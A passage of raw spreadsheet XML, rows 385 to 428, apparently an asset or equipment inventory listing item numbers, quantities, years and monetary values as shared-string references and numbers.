      <c r="G385" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H385" s="11">
        <v>2</v>
      </c>
      <c r="I385" s="237" t="s">
        <v>1182</v>
      </c>
      <c r="J385" s="91">
        <v>8547.01</v>
      </c>
      <c r="K385" s="99">
        <v>4608</v>
      </c>
      <c r="L385" s="238" t="s">
        <v>1183</v>
      </c>
      <c r="M385" s="225"/>
    </row>
    <row r="386" ht="14.25" customHeight="1" spans="2:13">
      <c r="B386" s="11">
        <v>369</v>
      </c>
      <c r="C386" s="237" t="s">
        <v>1184</v>
      </c>
      <c r="D386" s="238" t="s">
        <v>1011</v>
      </c>
      <c r="E386" s="237" t="s">
        <v>1185</v>
      </c>
      <c r="F386" s="201"/>
      <c r="G386" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H386" s="11">
        <v>1</v>
      </c>
      <c r="I386" s="237" t="s">
        <v>1186</v>
      </c>
      <c r="J386" s="100">
        <v>2478.63</v>
      </c>
      <c r="K386" s="99">
        <v>806.4</v>
      </c>
      <c r="L386" s="239" t="s">
        <v>1187</v>
      </c>
      <c r="M386" s="225"/>
    </row>
    <row r="387" ht="14.25" customHeight="1" spans="2:13">
      <c r="B387" s="11">
        <v>370</v>
      </c>
      <c r="C387" s="237" t="s">
        <v>1188</v>
      </c>
      <c r="D387" s="238" t="s">
        <v>1189</v>
      </c>
      <c r="E387" s="237" t="s">
        <v>1190</v>
      </c>
      <c r="F387" s="201"/>
      <c r="G387" s="16" t="s">
        <v>1191</v>
      </c>
      <c r="H387" s="11">
        <v>1</v>
      </c>
      <c r="I387" s="237" t="s">
        <v>1192</v>
      </c>
      <c r="J387" s="100">
        <v>82500</v>
      </c>
      <c r="K387" s="99">
        <v>27720</v>
      </c>
      <c r="L387" s="239" t="s">
        <v>1187</v>
      </c>
      <c r="M387" s="225"/>
    </row>
    <row r="388" ht="14.25" customHeight="1" spans="2:13">
      <c r="B388" s="11">
        <v>371</v>
      </c>
      <c r="C388" s="237" t="s">
        <v>1193</v>
      </c>
      <c r="D388" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E388" s="237" t="s">
        <v>1194</v>
      </c>
      <c r="F388" s="201"/>
      <c r="G388" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H388" s="11">
        <v>1</v>
      </c>
      <c r="I388" s="237" t="s">
        <v>1195</v>
      </c>
      <c r="J388" s="100">
        <v>100000</v>
      </c>
      <c r="K388" s="99">
        <v>0</v>
      </c>
      <c r="L388" s="239" t="s">
        <v>1187</v>
      </c>
      <c r="M388" s="225"/>
    </row>
    <row r="389" ht="14.25" customHeight="1" spans="2:13">
      <c r="B389" s="11">
        <v>372</v>
      </c>
      <c r="C389" s="237" t="s">
        <v>1196</v>
      </c>
      <c r="D389" s="238" t="s">
        <v>1197</v>
      </c>
      <c r="E389" s="237" t="s">
        <v>1198</v>
      </c>
      <c r="F389" s="201"/>
      <c r="G389" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H389" s="11">
        <v>2</v>
      </c>
      <c r="I389" s="237" t="s">
        <v>1199</v>
      </c>
      <c r="J389" s="100">
        <v>16000</v>
      </c>
      <c r="K389" s="99">
        <v>0</v>
      </c>
      <c r="L389" s="239" t="s">
        <v>1187</v>
      </c>
      <c r="M389" s="225"/>
    </row>
    <row r="390" ht="14.25" customHeight="1" spans="2:13">
      <c r="B390" s="11">
        <v>373</v>
      </c>
      <c r="C390" s="237" t="s">
        <v>1200</v>
      </c>
      <c r="D390" s="238" t="s">
        <v>1201</v>
      </c>
      <c r="E390" s="237" t="s">
        <v>1202</v>
      </c>
      <c r="F390" s="201"/>
      <c r="G390" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H390" s="11">
        <v>2</v>
      </c>
      <c r="I390" s="237" t="s">
        <v>1203</v>
      </c>
      <c r="J390" s="100">
        <v>6735.04</v>
      </c>
      <c r="K390" s="99">
        <v>0</v>
      </c>
      <c r="L390" s="239" t="s">
        <v>1187</v>
      </c>
      <c r="M390" s="225"/>
    </row>
    <row r="391" ht="14.25" customHeight="1" spans="2:13">
      <c r="B391" s="11">
        <v>374</v>
      </c>
      <c r="C391" s="237" t="s">
        <v>1204</v>
      </c>
      <c r="D391" s="238" t="s">
        <v>1205</v>
      </c>
      <c r="E391" s="237" t="s">
        <v>1206</v>
      </c>
      <c r="F391" s="201"/>
      <c r="G391" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H391" s="11">
        <v>1</v>
      </c>
      <c r="I391" s="237" t="s">
        <v>1203</v>
      </c>
      <c r="J391" s="100">
        <v>36752.14</v>
      </c>
      <c r="K391" s="99">
        <v>0</v>
      </c>
      <c r="L391" s="239" t="s">
        <v>1187</v>
      </c>
      <c r="M391" s="225"/>
    </row>
    <row r="392" ht="14.25" customHeight="1" spans="2:13">
      <c r="B392" s="11">
        <v>375</v>
      </c>
      <c r="C392" s="237" t="s">
        <v>1207</v>
      </c>
      <c r="D392" s="238" t="s">
        <v>1208</v>
      </c>
      <c r="E392" s="10"/>
      <c r="F392" s="14"/>
      <c r="G392" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H392" s="11">
        <v>1</v>
      </c>
      <c r="I392" s="237" t="s">
        <v>1046</v>
      </c>
      <c r="J392" s="91">
        <v>53000</v>
      </c>
      <c r="K392" s="99">
        <v>20034</v>
      </c>
      <c r="L392" s="238" t="s">
        <v>1209</v>
      </c>
      <c r="M392" s="225"/>
    </row>
    <row r="393" ht="14.25" customHeight="1" spans="2:13">
      <c r="B393" s="11">
        <v>376</v>
      </c>
      <c r="C393" s="11"/>
      <c r="D393" s="10" t="s">
        <v>947</v>
      </c>
      <c r="E393" s="10" t="s">
        <v>1210</v>
      </c>
      <c r="F393" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G393" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H393" s="11">
        <v>1</v>
      </c>
      <c r="I393" s="11">
        <v>2010</v>
      </c>
      <c r="J393" s="91"/>
      <c r="K393" s="99">
        <v>138240</v>
      </c>
      <c r="L393" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M393" s="225"/>
    </row>
    <row r="394" ht="14.25" customHeight="1" spans="2:13">
      <c r="B394" s="11">
        <v>377</v>
      </c>
      <c r="C394" s="11"/>
      <c r="D394" s="10" t="s">
        <v>1211</v>
      </c>
      <c r="E394" s="10" t="s">
        <v>1212</v>
      </c>
      <c r="F394" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G394" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H394" s="11">
        <v>1</v>
      </c>
      <c r="I394" s="11">
        <v>2010</v>
      </c>
      <c r="J394" s="91"/>
      <c r="K394" s="99">
        <v>23040</v>
      </c>
      <c r="L394" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M394" s="225"/>
    </row>
    <row r="395" ht="14.25" customHeight="1" spans="2:13">
      <c r="B395" s="11">
        <v>378</v>
      </c>
      <c r="C395" s="11"/>
      <c r="D395" s="10" t="s">
        <v>881</v>
      </c>
      <c r="E395" s="10" t="s">
        <v>1213</v>
      </c>
      <c r="F395" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G395" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H395" s="11">
        <v>4</v>
      </c>
      <c r="I395" s="11">
        <v>2010</v>
      </c>
      <c r="J395" s="91"/>
      <c r="K395" s="99">
        <v>288000</v>
      </c>
      <c r="L395" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M395" s="225"/>
    </row>
    <row r="396" ht="14.25" customHeight="1" spans="2:13">
      <c r="B396" s="11">
        <v>379</v>
      </c>
      <c r="C396" s="11"/>
      <c r="D396" s="10" t="s">
        <v>1110</v>
      </c>
      <c r="E396" s="10" t="s">
        <v>1214</v>
      </c>
      <c r="F396" s="9" t="s">
        <v>1215</v>
      </c>
      <c r="G396" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H396" s="11">
        <v>2</v>
      </c>
      <c r="I396" s="11">
        <v>2008.8</v>
      </c>
      <c r="J396" s="91"/>
      <c r="K396" s="99">
        <v>1612</v>
      </c>
      <c r="L396" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M396" s="225"/>
    </row>
    <row r="397" ht="14.25" customHeight="1" spans="2:13">
      <c r="B397" s="11">
        <v>380</v>
      </c>
      <c r="C397" s="11"/>
      <c r="D397" s="10" t="s">
        <v>1070</v>
      </c>
      <c r="E397" s="10" t="s">
        <v>1216</v>
      </c>
      <c r="F397" s="9" t="s">
        <v>1217</v>
      </c>
      <c r="G397" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H397" s="11">
        <v>1</v>
      </c>
      <c r="I397" s="11">
        <v>2010</v>
      </c>
      <c r="J397" s="91"/>
      <c r="K397" s="99">
        <v>2016</v>
      </c>
      <c r="L397" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M397" s="225"/>
    </row>
    <row r="398" ht="14.25" customHeight="1" spans="2:13">
      <c r="B398" s="226" t="s">
        <v>1218</v>
      </c>
      <c r="C398" s="227"/>
      <c r="D398" s="228"/>
      <c r="E398" s="10"/>
      <c r="F398" s="14"/>
      <c r="G398" s="11"/>
      <c r="H398" s="11"/>
      <c r="I398" s="11"/>
      <c r="J398" s="91"/>
      <c r="K398" s="99">
        <v>0</v>
      </c>
      <c r="L398" s="10"/>
      <c r="M398" s="225"/>
    </row>
    <row r="399" ht="14.25" customHeight="1" spans="2:13">
      <c r="B399" s="16">
        <v>381</v>
      </c>
      <c r="C399" s="237" t="s">
        <v>1219</v>
      </c>
      <c r="D399" s="238" t="s">
        <v>1220</v>
      </c>
      <c r="E399" s="237" t="s">
        <v>1221</v>
      </c>
      <c r="F399" s="17"/>
      <c r="G399" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H399" s="11">
        <v>1</v>
      </c>
      <c r="I399" s="237" t="s">
        <v>1222</v>
      </c>
      <c r="J399" s="100">
        <v>834059.84</v>
      </c>
      <c r="K399" s="99">
        <v>382200</v>
      </c>
      <c r="L399" s="239" t="s">
        <v>1223</v>
      </c>
      <c r="M399" s="225"/>
    </row>
    <row r="400" ht="14.25" customHeight="1" spans="2:13">
      <c r="B400" s="16">
        <v>382</v>
      </c>
      <c r="C400" s="237" t="s">
        <v>1224</v>
      </c>
      <c r="D400" s="238" t="s">
        <v>435</v>
      </c>
      <c r="E400" s="237" t="s">
        <v>1225</v>
      </c>
      <c r="F400" s="17"/>
      <c r="G400" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H400" s="11">
        <v>1</v>
      </c>
      <c r="I400" s="237" t="s">
        <v>462</v>
      </c>
      <c r="J400" s="100">
        <v>81196.58</v>
      </c>
      <c r="K400" s="99">
        <v>31360</v>
      </c>
      <c r="L400" s="239" t="s">
        <v>1226</v>
      </c>
      <c r="M400" s="225"/>
    </row>
    <row r="401" ht="14.25" customHeight="1" spans="2:13">
      <c r="B401" s="16">
        <v>383</v>
      </c>
      <c r="C401" s="237" t="s">
        <v>1227</v>
      </c>
      <c r="D401" s="238" t="s">
        <v>1228</v>
      </c>
      <c r="E401" s="237" t="s">
        <v>1229</v>
      </c>
      <c r="F401" s="17"/>
      <c r="G401" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H401" s="11">
        <v>1</v>
      </c>
      <c r="I401" s="237" t="s">
        <v>1230</v>
      </c>
      <c r="J401" s="100">
        <v>7008.55</v>
      </c>
      <c r="K401" s="99">
        <v>4704</v>
      </c>
      <c r="L401" s="239" t="s">
        <v>1231</v>
      </c>
      <c r="M401" s="225"/>
    </row>
    <row r="402" ht="14.25" customHeight="1" spans="2:13">
      <c r="B402" s="16">
        <v>384</v>
      </c>
      <c r="C402" s="237" t="s">
        <v>1232</v>
      </c>
      <c r="D402" s="238" t="s">
        <v>1233</v>
      </c>
      <c r="E402" s="237" t="s">
        <v>1234</v>
      </c>
      <c r="F402" s="17"/>
      <c r="G402" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H402" s="11">
        <v>1</v>
      </c>
      <c r="I402" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J402" s="100">
        <v>1521000</v>
      </c>
      <c r="K402" s="99">
        <v>470400</v>
      </c>
      <c r="L402" s="239" t="s">
        <v>1235</v>
      </c>
      <c r="M402" s="225"/>
    </row>
    <row r="403" ht="14.25" customHeight="1" spans="2:13">
      <c r="B403" s="16">
        <v>385</v>
      </c>
      <c r="C403" s="237" t="s">
        <v>1236</v>
      </c>
      <c r="D403" s="238" t="s">
        <v>1237</v>
      </c>
      <c r="E403" s="237" t="s">
        <v>1238</v>
      </c>
      <c r="F403" s="17"/>
      <c r="G403" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H403" s="11">
        <v>1</v>
      </c>
      <c r="I403" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J403" s="100">
        <v>1330</v>
      </c>
      <c r="K403" s="99">
        <v>0</v>
      </c>
      <c r="L403" s="239" t="s">
        <v>1235</v>
      </c>
      <c r="M403" s="225"/>
    </row>
    <row r="404" ht="14.25" customHeight="1" spans="2:13">
      <c r="B404" s="16">
        <v>386</v>
      </c>
      <c r="C404" s="237" t="s">
        <v>1239</v>
      </c>
      <c r="D404" s="238" t="s">
        <v>1240</v>
      </c>
      <c r="E404" s="237" t="s">
        <v>1241</v>
      </c>
      <c r="F404" s="17"/>
      <c r="G404" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H404" s="11">
        <v>1</v>
      </c>
      <c r="I404" s="237" t="s">
        <v>871</v>
      </c>
      <c r="J404" s="100">
        <v>265000</v>
      </c>
      <c r="K404" s="99">
        <v>38220</v>
      </c>
      <c r="L404" s="239" t="s">
        <v>1235</v>
      </c>
      <c r="M404" s="225"/>
    </row>
    <row r="405" ht="14.25" customHeight="1" spans="2:13">
      <c r="B405" s="16">
        <v>387</v>
      </c>
      <c r="C405" s="237" t="s">
        <v>1242</v>
      </c>
      <c r="D405" s="238" t="s">
        <v>1243</v>
      </c>
      <c r="E405" s="237" t="s">
        <v>1244</v>
      </c>
      <c r="F405" s="17"/>
      <c r="G405" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H405" s="11">
        <v>1</v>
      </c>
      <c r="I405" s="237" t="s">
        <v>1094</v>
      </c>
      <c r="J405" s="100">
        <v>650000</v>
      </c>
      <c r="K405" s="99">
        <v>109200</v>
      </c>
      <c r="L405" s="239" t="s">
        <v>1235</v>
      </c>
      <c r="M405" s="225"/>
    </row>
    <row r="406" ht="14.25" customHeight="1" spans="2:13">
      <c r="B406" s="16">
        <v>388</v>
      </c>
      <c r="C406" s="237" t="s">
        <v>1245</v>
      </c>
      <c r="D406" s="238" t="s">
        <v>1246</v>
      </c>
      <c r="E406" s="11"/>
      <c r="F406" s="17"/>
      <c r="G406" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H406" s="11">
        <v>1</v>
      </c>
      <c r="I406" s="237" t="s">
        <v>982</v>
      </c>
      <c r="J406" s="100">
        <v>820000</v>
      </c>
      <c r="K406" s="99">
        <v>203360</v>
      </c>
      <c r="L406" s="239" t="s">
        <v>1235</v>
      </c>
      <c r="M406" s="225"/>
    </row>
    <row r="407" ht="14.25" customHeight="1" spans="2:13">
      <c r="B407" s="16">
        <v>389</v>
      </c>
      <c r="C407" s="237" t="s">
        <v>1247</v>
      </c>
      <c r="D407" s="238" t="s">
        <v>1248</v>
      </c>
      <c r="E407" s="238" t="s">
        <v>682</v>
      </c>
      <c r="F407" s="14"/>
      <c r="G407" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H407" s="11">
        <v>7</v>
      </c>
      <c r="I407" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J407" s="91">
        <v>50000</v>
      </c>
      <c r="K407" s="99">
        <v>43400</v>
      </c>
      <c r="L407" s="238" t="s">
        <v>1235</v>
      </c>
      <c r="M407" s="225"/>
    </row>
    <row r="408" ht="14.25" customHeight="1" spans="2:13">
      <c r="B408" s="16">
        <v>390</v>
      </c>
      <c r="C408" s="237" t="s">
        <v>1249</v>
      </c>
      <c r="D408" s="238" t="s">
        <v>1250</v>
      </c>
      <c r="E408" s="237" t="s">
        <v>1251</v>
      </c>
      <c r="F408" s="17"/>
      <c r="G408" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H408" s="11">
        <v>1</v>
      </c>
      <c r="I408" s="237" t="s">
        <v>776</v>
      </c>
      <c r="J408" s="100">
        <v>2365224.11</v>
      </c>
      <c r="K408" s="99">
        <v>724500</v>
      </c>
      <c r="L408" s="239" t="s">
        <v>1252</v>
      </c>
      <c r="M408" s="225"/>
    </row>
    <row r="409" ht="14.25" customHeight="1" spans="2:13">
      <c r="B409" s="16">
        <v>391</v>
      </c>
      <c r="C409" s="11"/>
      <c r="D409" s="10" t="s">
        <v>1253</v>
      </c>
      <c r="E409" s="10" t="s">
        <v>1254</v>
      </c>
      <c r="F409" s="9" t="s">
        <v>1255</v>
      </c>
      <c r="G409" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H409" s="11">
        <v>1</v>
      </c>
      <c r="I409" s="11">
        <v>2000</v>
      </c>
      <c r="J409" s="91"/>
      <c r="K409" s="99">
        <v>400</v>
      </c>
      <c r="L409" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M409" s="225"/>
    </row>
    <row r="410" ht="14.25" customHeight="1" spans="2:13">
      <c r="B410" s="16">
        <v>392</v>
      </c>
      <c r="C410" s="11"/>
      <c r="D410" s="10" t="s">
        <v>1256</v>
      </c>
      <c r="E410" s="10" t="s">
        <v>1257</v>
      </c>
      <c r="F410" s="9" t="s">
        <v>1089</v>
      </c>
      <c r="G410" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H410" s="11">
        <v>3</v>
      </c>
      <c r="I410" s="11">
        <v>2000</v>
      </c>
      <c r="J410" s="91"/>
      <c r="K410" s="99">
        <v>960</v>
      </c>
      <c r="L410" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M410" s="225"/>
    </row>
    <row r="411" ht="14.25" customHeight="1" spans="2:13">
      <c r="B411" s="16">
        <v>393</v>
      </c>
      <c r="C411" s="11"/>
      <c r="D411" s="10" t="s">
        <v>222</v>
      </c>
      <c r="E411" s="10" t="s">
        <v>1258</v>
      </c>
      <c r="F411" s="9" t="s">
        <v>1259</v>
      </c>
      <c r="G411" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H411" s="11">
        <v>1</v>
      </c>
      <c r="I411" s="11">
        <v>2011</v>
      </c>
      <c r="J411" s="91"/>
      <c r="K411" s="99">
        <v>1102.5</v>
      </c>
      <c r="L411" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M411" s="225"/>
    </row>
    <row r="412" ht="14.25" customHeight="1" spans="2:13">
      <c r="B412" s="16">
        <v>394</v>
      </c>
      <c r="C412" s="11"/>
      <c r="D412" s="10" t="s">
        <v>1169</v>
      </c>
      <c r="E412" s="10" t="s">
        <v>1260</v>
      </c>
      <c r="F412" s="9" t="s">
        <v>1255</v>
      </c>
      <c r="G412" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H412" s="11">
        <v>3</v>
      </c>
      <c r="I412" s="11">
        <v>2000</v>
      </c>
      <c r="J412" s="91"/>
      <c r="K412" s="99">
        <v>840</v>
      </c>
      <c r="L412" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M412" s="225"/>
    </row>
    <row r="413" ht="14.25" customHeight="1" spans="2:13">
      <c r="B413" s="16">
        <v>395</v>
      </c>
      <c r="C413" s="11"/>
      <c r="D413" s="10" t="s">
        <v>1261</v>
      </c>
      <c r="E413" s="10" t="s">
        <v>1262</v>
      </c>
      <c r="F413" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="G413" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H413" s="11">
        <v>2</v>
      </c>
      <c r="I413" s="11">
        <v>2010</v>
      </c>
      <c r="J413" s="91"/>
      <c r="K413" s="99">
        <v>2880</v>
      </c>
      <c r="L413" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M413" s="225"/>
    </row>
    <row r="414" ht="14.25" customHeight="1" spans="2:13">
      <c r="B414" s="16">
        <v>396</v>
      </c>
      <c r="C414" s="11"/>
      <c r="D414" s="10" t="s">
        <v>1264</v>
      </c>
      <c r="E414" s="10" t="s">
        <v>1265</v>
      </c>
      <c r="F414" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G414" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H414" s="11">
        <v>1</v>
      </c>
      <c r="I414" s="11">
        <v>2005</v>
      </c>
      <c r="J414" s="91"/>
      <c r="K414" s="99">
        <v>8280</v>
      </c>
      <c r="L414" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M414" s="225"/>
    </row>
    <row r="415" ht="14.25" customHeight="1" spans="2:13">
      <c r="B415" s="16">
        <v>397</v>
      </c>
      <c r="C415" s="11"/>
      <c r="D415" s="10" t="s">
        <v>1267</v>
      </c>
      <c r="E415" s="10" t="s">
        <v>342</v>
      </c>
      <c r="F415" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="G415" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H415" s="11">
        <v>1</v>
      </c>
      <c r="I415" s="11">
        <v>2005</v>
      </c>
      <c r="J415" s="91"/>
      <c r="K415" s="99">
        <v>5520</v>
      </c>
      <c r="L415" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M415" s="225"/>
    </row>
    <row r="416" ht="14.25" customHeight="1" spans="2:13">
      <c r="B416" s="16">
        <v>398</v>
      </c>
      <c r="C416" s="11"/>
      <c r="D416" s="10" t="s">
        <v>1268</v>
      </c>
      <c r="E416" s="10" t="s">
        <v>1269</v>
      </c>
      <c r="F416" s="9" t="s">
        <v>1270</v>
      </c>
      <c r="G416" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H416" s="11">
        <v>1</v>
      </c>
      <c r="I416" s="11">
        <v>2011</v>
      </c>
      <c r="J416" s="91"/>
      <c r="K416" s="99">
        <v>1575</v>
      </c>
      <c r="L416" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M416" s="225"/>
    </row>
    <row r="417" ht="14.25" customHeight="1" spans="2:13">
      <c r="B417" s="16">
        <v>399</v>
      </c>
      <c r="C417" s="11"/>
      <c r="D417" s="10" t="s">
        <v>1271</v>
      </c>
      <c r="E417" s="10" t="s">
        <v>1272</v>
      </c>
      <c r="F417" s="9"/>
      <c r="G417" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H417" s="11">
        <v>1</v>
      </c>
      <c r="I417" s="11">
        <v>2010</v>
      </c>
      <c r="J417" s="91"/>
      <c r="K417" s="99">
        <v>23040</v>
      </c>
      <c r="L417" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M417" s="225"/>
    </row>
    <row r="418" ht="14.25" customHeight="1" spans="2:13">
      <c r="B418" s="16">
        <v>400</v>
      </c>
      <c r="C418" s="11"/>
      <c r="D418" s="10" t="s">
        <v>1273</v>
      </c>
      <c r="E418" s="10"/>
      <c r="F418" s="9"/>
      <c r="G418" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H418" s="11">
        <v>2</v>
      </c>
      <c r="I418" s="11"/>
      <c r="J418" s="91"/>
      <c r="K418" s="99">
        <v>12800</v>
      </c>
      <c r="L418" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M418" s="225"/>
    </row>
    <row r="419" ht="14.25" customHeight="1" spans="2:13">
      <c r="B419" s="16">
        <v>401</v>
      </c>
      <c r="C419" s="11"/>
      <c r="D419" s="10" t="s">
        <v>1273</v>
      </c>
      <c r="E419" s="10" t="s">
        <v>1274</v>
      </c>
      <c r="F419" s="9" t="s">
        <v>1275</v>
      </c>
      <c r="G419" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H419" s="11">
        <v>2</v>
      </c>
      <c r="I419" s="11">
        <v>2000</v>
      </c>
      <c r="J419" s="91"/>
      <c r="K419" s="99">
        <v>24000</v>
      </c>
      <c r="L419" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M419" s="225"/>
    </row>
    <row r="420" ht="14.25" customHeight="1" spans="2:13">
      <c r="B420" s="16">
        <v>402</v>
      </c>
      <c r="C420" s="11"/>
      <c r="D420" s="10" t="s">
        <v>1273</v>
      </c>
      <c r="E420" s="10">
        <v>40</v>
      </c>
      <c r="F420" s="9"/>
      <c r="G420" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H420" s="11">
        <v>2</v>
      </c>
      <c r="I420" s="11"/>
      <c r="J420" s="91"/>
      <c r="K420" s="99">
        <v>12800</v>
      </c>
      <c r="L420" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M420" s="225"/>
    </row>
    <row r="421" ht="14.25" customHeight="1" spans="2:13">
      <c r="B421" s="16">
        <v>403</v>
      </c>
      <c r="C421" s="11"/>
      <c r="D421" s="10" t="s">
        <v>1273</v>
      </c>
      <c r="E421" s="10" t="s">
        <v>1276</v>
      </c>
      <c r="F421" s="9" t="s">
        <v>1277</v>
      </c>
      <c r="G421" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H421" s="11">
        <v>1</v>
      </c>
      <c r="I421" s="11"/>
      <c r="J421" s="91"/>
      <c r="K421" s="99">
        <v>6400</v>
      </c>
      <c r="L421" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M421" s="225"/>
    </row>
    <row r="422" ht="14.25" customHeight="1" spans="2:13">
      <c r="B422" s="16">
        <v>404</v>
      </c>
      <c r="C422" s="11"/>
      <c r="D422" s="10" t="s">
        <v>1273</v>
      </c>
      <c r="E422" s="10"/>
      <c r="F422" s="9"/>
      <c r="G422" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H422" s="11">
        <v>1</v>
      </c>
      <c r="I422" s="11"/>
      <c r="J422" s="91"/>
      <c r="K422" s="99">
        <v>6400</v>
      </c>
      <c r="L422" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M422" s="225"/>
    </row>
    <row r="423" ht="14.25" customHeight="1" spans="2:13">
      <c r="B423" s="16">
        <v>405</v>
      </c>
      <c r="C423" s="11"/>
      <c r="D423" s="10" t="s">
        <v>1011</v>
      </c>
      <c r="E423" s="10"/>
      <c r="F423" s="9"/>
      <c r="G423" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H423" s="11">
        <v>7</v>
      </c>
      <c r="I423" s="11"/>
      <c r="J423" s="91"/>
      <c r="K423" s="99">
        <v>2800</v>
      </c>
      <c r="L423" s="10" t="s">
        <v>1235</v>
      </c>
      <c r="M423" s="225"/>
    </row>
    <row r="424" ht="14.25" customHeight="1" spans="2:13">
      <c r="B424" s="226" t="s">
        <v>1278</v>
      </c>
      <c r="C424" s="227"/>
      <c r="D424" s="228"/>
      <c r="E424" s="10"/>
      <c r="F424" s="14"/>
      <c r="G424" s="11"/>
      <c r="H424" s="11"/>
      <c r="I424" s="11"/>
      <c r="J424" s="91"/>
      <c r="K424" s="99">
        <v>0</v>
      </c>
      <c r="L424" s="10"/>
      <c r="M424" s="225"/>
    </row>
    <row r="425" ht="14.25" customHeight="1" spans="2:13">
      <c r="B425" s="11">
        <v>405</v>
      </c>
      <c r="C425" s="237" t="s">
        <v>1279</v>
      </c>
      <c r="D425" s="238" t="s">
        <v>1280</v>
      </c>
      <c r="E425" s="238" t="s">
        <v>1281</v>
      </c>
      <c r="F425" s="14"/>
      <c r="G425" s="11" t="s">
        <v>507</v>
      </c>
      <c r="H425" s="11">
        <v>2</v>
      </c>
      <c r="I425" s="237" t="s">
        <v>1282</v>
      </c>
      <c r="J425" s="91">
        <v>220000</v>
      </c>
      <c r="K425" s="99">
        <v>49600</v>
      </c>
      <c r="L425" s="238" t="s">
        <v>1283</v>
      </c>
      <c r="M425" s="225"/>
    </row>
    <row r="426" ht="14.25" customHeight="1" spans="2:13">
      <c r="B426" s="11">
        <v>406</v>
      </c>
      <c r="C426" s="237" t="s">
        <v>1284</v>
      </c>
      <c r="D426" s="238" t="s">
        <v>1285</v>
      </c>
      <c r="E426" s="10"/>
      <c r="F426" s="14"/>
      <c r="G426" s="11"/>
      <c r="H426" s="11"/>
      <c r="I426" s="237" t="s">
        <v>1222</v>
      </c>
      <c r="J426" s="91">
        <v>770000</v>
      </c>
      <c r="K426" s="99">
        <v>209440</v>
      </c>
      <c r="L426" s="238" t="s">
        <v>1283</v>
      </c>
      <c r="M426" s="225"/>
    </row>
    <row r="427" ht="14.25" customHeight="1" spans="2:13">
      <c r="B427" s="11">
        <v>407</v>
      </c>
      <c r="C427" s="237" t="s">
        <v>1286</v>
      </c>
      <c r="D427" s="238" t="s">
        <v>1287</v>
      </c>
      <c r="E427" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="F427" s="9" t="s">
        <v>1289</v>
      </c>
      <c r="G427" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H427" s="11">
        <v>4</v>
      </c>
      <c r="I427" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J427" s="91">
        <v>3610</v>
      </c>
      <c r="K427" s="99">
        <v>12000</v>
      </c>
      <c r="L427" s="238" t="s">
        <v>1290</v>
      </c>
      <c r="M427" s="225"/>
    </row>
    <row r="428" ht="14.25" customHeight="1" spans="2:13">
      <c r="B428" s="11">
        <v>408</v>
      </c>
      <c r="C428" s="237" t="s">
        <v>1291</v>
      </c>
      <c r="D428" s="238" t="s">
        <v>1292</v>
      </c>
      <c r="E428" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="F428" s="14"/>
      <c r="G428" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H428" s="11">
        <v>1</v>
      </c>
      <c r="I428" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J428" s="91">
        <v>31000</v>
      </c>
      <c r="K428" s="99">
        <v>3000</v>
      </c>
